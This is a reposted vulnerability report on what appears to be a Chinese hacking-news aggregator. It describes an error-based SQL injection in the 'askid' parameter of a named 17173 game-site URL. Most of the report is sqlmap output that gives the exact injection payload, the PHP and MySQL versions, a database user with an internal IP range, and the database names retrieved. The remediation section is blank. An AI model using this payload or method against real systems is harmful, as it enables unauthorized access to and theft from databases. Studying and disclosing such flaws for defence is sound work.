记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

17173游戏某接口SQL注入(报错注入)

2015-09-18 19:15

http://m.bk.17173.com/question/detail?askid=1003296&classid=1009568&from=mobile

注入点 askid

漏洞证明:

[*] starting at 17:52:37



[17:52:38] [INFO] resuming back-end DBMS 'mysql'

[17:52:38] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Parameter: askid (GET)

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: askid=1003296 AND (SELECT 7203 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (ELT(7203=7203,1))),0x7176767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&classid=1009568&from=mobile



---

[17:52:38] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.27

back-end DBMS: MySQL 5.0

[17:52:38] [INFO] fetching database users

[17:52:38] [INFO] heuristics detected web page charset 'utf-8'

[17:52:38] [INFO] the SQL query used returns 1 entries

[17:52:38] [INFO] retrieved: 'newbaike'@'10.59.107.%'

database management system users [1]:

[*] 'newbaike'@'10.59.107.%'



[17:52:39] [INFO] fetching database names

[17:52:39] [INFO] the SQL query used returns 2 entries

[17:52:39] [INFO] resumed: information_schema

[17:52:39] [INFO] resumed: newbk

available databases [2]:

[*] information_schema

[*] newbk

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0131365

阅读:73455 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“17173游戏某接口SQL注入(报错注入)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词